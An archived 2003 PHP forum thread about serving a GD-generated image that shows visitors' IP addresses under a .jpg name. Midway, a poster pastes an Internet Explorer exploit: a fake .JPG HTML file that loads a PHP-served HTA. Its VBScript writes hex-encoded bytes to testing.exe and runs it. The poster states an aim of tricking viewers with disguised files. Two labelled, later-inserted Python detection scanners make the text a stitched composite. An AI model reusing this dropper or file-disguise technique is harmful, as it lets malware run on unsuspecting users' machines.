PHP page acting as JPG


Extreme
11-09-2003, 06:18 PM
I saw some examples of a picture showing on a website, and actually it was PHP code... I wonder how it is done? An example of such stuff you can see here:
http://www.danasoft.com

Check the picture on top... It will show your IP and some more info.. So it has to be some PHP code.. But how did they convert it to JPG???

pyro
11-09-2003, 06:29 PM
It simply uses GD (http://us4.php.net/gd). I've had loads of fun with GD in PHP... :)

Extreme
11-09-2003, 06:51 PM
Very interesting.. However, I was only able to find this code...

<?php
header("Content-type: image/png");
$string = $_GET['text'];
$im = imagecreatefrompng("images/button1.png");
$orange = imagecolorallocate($im, 220, 210, 60);
$px = (imagesx($im) - 7.5 * strlen($string)) / 2;
imagestring($im, 3, $px, 9, $string, $orange);
imagepng($im);
imagedestroy($im);
?>


Now, can you please post some code that would show some JPG picture, from "/images/pic.jpg" and would load a PHP code in a background from "/code/example.php". And without unnecessary stuff like $orange variable in my example. I think it is irrelevant..
Also, for example, I wish to use this code:
$IP = $HTTP_SERVER_VARS['REMOTE_ADDR'];
to be shown on the picture, but I was wondering if there is a way that this code is executed, but not visible on picture???

pyro
11-09-2003, 07:19 PM
I'm not exactly sure what you are asking... The src for the image needs to point to the .php file that generates it.

Extreme
11-09-2003, 08:11 PM
OK, I made three files:
1. I called it pic.jpg and here is its code:


<?php
header("Content-type: image/png");
$string = $_GET['ip.php'];
$im = imagecreatefrompng("viper.png");
$orange = imagecolorallocate($im, 220, 210, 60);
$px = (imagesx($im) - 7.5 * strlen($string)) / 2;
imagestring($im, 3, $px, 9, $string, $orange);
imagepng($im);
imagedestroy($im);
?>


2. ip.php

<?php
$IP = $HTTP_SERVER_VARS['REMOTE_ADDR'];
echo "$IP"
?>


and 3rd is my picture... viper.png.. When I put it all in the same folder and browse "pic.jpg", I get only code listed from pic.jpg.. It doesn't work...

PunkSktBrdr01
11-09-2003, 08:45 PM
The file needs to have the .php extension. Also, you need to have the GD library installed on your server. Once that's all taken care of, try this:


<?php
header("Content-type: image/jpeg");
$string = $_SERVER['REMOTE_ADDR'];
$im = imagecreatefrompng("viper.png");
$orange = imagecolorallocate($im, 220, 210, 60);
$px = (imagesx($im) - 7.5 * strlen($string)) / 2;
imagestring($im, 3, $px, 9, $string, $orange);
imagejpeg($im);
imagedestroy($im);
?>


That should work correctly. Make sure GD is installed on the server, though. To show the image, use <img src="pic.php">.

pyro
11-09-2003, 08:46 PM
Try changing:

$string = $_GET['ip.php'];

to:

$string = $_SERVER['REMOTE_ADDR'];

You can then delete ip.php.

Extreme
11-09-2003, 09:10 PM
Yeah, like I thought, it works... Because GD is implemented into all versions of PHP above 4.3 as I read...
Maybe I could name it JPG, but I would have to put something in front like:

<?php
header("Content-Type: application/PHP");
?>
<?php
header("Content-type: image/jpeg");
$string = $_SERVER['REMOTE_ADDR'];
$im = imagecreatefrompng("viper.png");
$orange = imagecolorallocate($im, 220, 210, 60);
$px = (imagesx($im) - 7.5 * strlen($string)) / 2;
imagestring($im, 3, $px, 9, $string, $orange);
imagejpeg($im);
imagedestroy($im);
?>



...so IE would recognize my pic.jpg as a PHP file, but I don't know what is content type for PHP file?? It probably is not "application/PHP"

Extreme
11-10-2003, 06:11 PM
Anyone know what is exact content type for PHP???

pyro
11-10-2003, 06:18 PM
application/x-httpd-php

Let me know if it works. I've never tried using it like this, so it'll be interesting to hear.

Extreme
11-10-2003, 08:00 PM
Well, I don't know why, but it doesn't work with PHP. When I make some test.jpg file and put in it only this code
<?php include('pic.php'); ?>
it doesn't work... But it works with HTML partially when I put this code and name my file test.jpg
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY>
<!--#include file="pic.php" -->
</BODY></HTML>
But I don't think I have HTML includes available on my hosting, and that is why it doesn't work... I have some IE exploit that uses that stuff with HTA files... But I don't have enough knowledge to implement it into this example... I can upload this IE exploit file, and you can examine the code if you wish???

pyro
11-10-2003, 09:03 PM
IE exploits are really not useful, as they are simply browser bugs, that will hopefully be fixed, and very doubtfully work in other browsers.

Extreme
11-10-2003, 09:18 PM
Yes, but this has nothing to do with exploits.. I just got an idea to mask *.jpg file that way, by looking at some exploit.. I can ZIP it up and upload here... If you wish to take a look...

pyro
11-10-2003, 09:32 PM
Not sure what you want me to take a look at, but sure, if you upload it, I'll take a look.

Extreme
11-10-2003, 10:22 PM
Well, here is the code of greymagic.JPG

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252"><xml id=oExec>
<security>
<exploit>
<![CDATA[
<object id="oFile" data="badnewz2.php"></object>
</XMLCDATA>
</exploit>
</security>
</xml>
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY><SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>
</BODY></HTML>

.. now, as you see, the file is called JPG, but after you execute it inside IE, the code inside it will still be executed, because IE recognised that it was actually an HTML file, although I have put a JPG extension...
** This is content of badnewz2.php

<?php
header("Content-Type: application/hta");
?>
<script language=vbs>
self.MoveTo 5000,5000
dim v(24)
cut=""
...
v(0)="4D,5A,44,A0,8E,C0,C3,66"
..

function res(x,y)
For k = 0 To UBound(v)
v(k) = Replace(v(k), x, y)
Next
End Function

res "z", "FF"
res "y", "00"
piece = Split(cut, "/")
cc = 103

For n = 0 To UBound(piece) - 1
res Chr(cc), piece(n)
cc = cc + 1
Next

For m = 0 To UBound(v)
it = it & v(m)
Next


tmp = Split(it, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = "testing.exe"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
Set shell=CreateObject("WScript.Shell")
shell.run(pth)
</script>

...As you see here, there is a content type in the beginning, which tricks IE into thinking that HTA file is actually a trustable PHP file.
Now. My point is to take example code from first post, and name it JPG instead of PHP, and so the code would still work...
Maybe you could find a way by examining what I pasted here.
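
Added example, not part of the original post: the post above depends on the browser handling a file by its content rather than by its .jpg name. A defender can look for the same mismatch on the server by comparing the leading bytes of each image-named file with the format's signature; the function names and sample inputs are assumptions made for this example.

```python
# Added example: flag files whose image extension does not match their content.
import os

# Leading bytes ("magic numbers") of the image formats named in this thread.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}
# Markers suggesting the file is really markup or script (heuristic list).
SCRIPT_MARKERS = (b"<?php", b"<html", b"<!doctype", b"<script", b"<object")


def classify(name, data):
    """Return 'ok', 'mismatch' or 'script' for one file name and its first bytes."""
    ext = os.path.splitext(name)[1].lower()
    if ext not in MAGIC:
        return "ok"  # not claiming to be an image, so out of scope here
    head = data[:512].lower()
    if any(marker in head for marker in SCRIPT_MARKERS):
        return "script"  # markup or script near the start, whatever the header says
    if not data.startswith(MAGIC[ext]):
        return "mismatch"  # wrong signature for the extension
    return "ok"


def scan(root):
    """Walk a directory tree and return {path: verdict} for suspicious files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                verdict = classify(name, fh.read(512))
            if verdict != "ok":
                findings[path] = verdict
    return findings
```

Sending the `X-Content-Type-Options: nosniff` response header additionally tells browsers that support it to honour the declared Content-Type instead of guessing from the content.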

DaiWelsh
11-11-2003, 10:30 AM
Did I miss the bit where you explained why the code had to be run as a .jpg?

Generally I would not expect Apache to process a .jpg looking for anything (even content type header) since (with default conf) it expects it to be a binary image and should just squirt it to the browser (however you seem to be suggesting it works for html in .jpg files so I am prepared to accept I could be wrong there).

If you want it to see .jpg as php then I would say configure Apache to see it that way using the conf file (if you don't want all jpgs to be affected I expect you can set this per directory though I am no expert).

While I understand that circumstances sometimes force strange measures it is generally best for yourself long term to work within the system not outside it and if .jpg is configured to be jpeg images then that is what they should be.

Extreme
11-11-2003, 12:11 PM
Well, wouldn't you like to point some file to JPG file, and to his surprise he sees some code, like "Your IP is ..." or something like that.. And no one will know how it was done.. Of course I have better reasons, but probably not interesting to you...

DaiWelsh
11-11-2003, 05:05 PM
ok, just wanted to be sure that was a requirement not just that you assumed you had no choice :) Like I said if possible configure the webserver to handle jpg as php, may be able to set it in an .htaccess if the server is configured to allow overrides on a directory level.

Extreme
11-12-2003, 03:55 AM
Yeah, but unfortunately, I don't have a way to configure the server because I just have hosting that I bought online...

pyro
11-12-2003, 06:46 AM
Try Dai's second suggestion, the .htaccess file. Make a .htaccess file and throw this line into it:

AddType application/x-httpd-php .php .jpg

Extreme
11-12-2003, 04:48 PM
You mean, I should just put a new .htaccess file into the directory where my picture is???
Should I name it somehow like name.htaccess or should I just name it .htaccess?

DaiWelsh
11-12-2003, 05:53 PM
yes, put it in the same dir as your php image generation script and just call it .htaccess as this is a special reserved name that apache web server uses for configuration settings. If you are lucky these settings will override the defaults for that directory, if you are unlucky your host will have set the overall apache configuration to disallow this. Worth a try though :)
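
Added note with an example that is not part of the thread: the AddType line suggested above sends every .jpg in that directory through the PHP interpreter, not only the image script, so any file with that extension placed there is executed as code. The Python sketch below scans .htaccess text for AddType/AddHandler lines that route image extensions to a PHP handler; the function name, the extension list and the sample file contents are constructed for illustration.

```python
# Added example: find .htaccess directives that make image files run as PHP.
import re

IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}
# AddType and AddHandler both take a type/handler name followed by extensions.
DIRECTIVE = re.compile(r"^\s*(AddType|AddHandler)\s+(\S+)\s+(.+)$", re.IGNORECASE)


def risky_mappings(htaccess_text):
    """Return (line_no, directive, image_exts) for each line that maps
    image extensions to a handler or type whose name contains 'php'."""
    hits = []
    for no, line in enumerate(htaccess_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # Apache treats lines starting with '#' as comments
        m = DIRECTIVE.match(line)
        if not m or "php" not in m.group(2).lower():
            continue  # heuristic: only PHP-related types/handlers matter here
        # Extensions may be written with or without the dot, in any case.
        exts = {e.lstrip(".").lower() for e in m.group(3).split()}
        bad = sorted(exts & IMAGE_EXTS)
        if bad:
            hits.append((no, m.group(1), bad))
    return hits


# Constructed sample; line 2 is the directive suggested in this thread.
SAMPLE = """\
# constructed sample .htaccess
AddType application/x-httpd-php .php .jpg
AddType image/jpeg .jpg .jpeg
#AddHandler php-script .png
AddHandler php-script .PNG gif
"""

if __name__ == "__main__":
    for line_no, directive, exts in risky_mappings(SAMPLE):
        print(f"line {line_no}: {directive} runs {', '.join(exts)} as PHP")
```

Directories that accept files from visitors are the ones where a hit matters most, since a mapping there turns any stored image name into executable script.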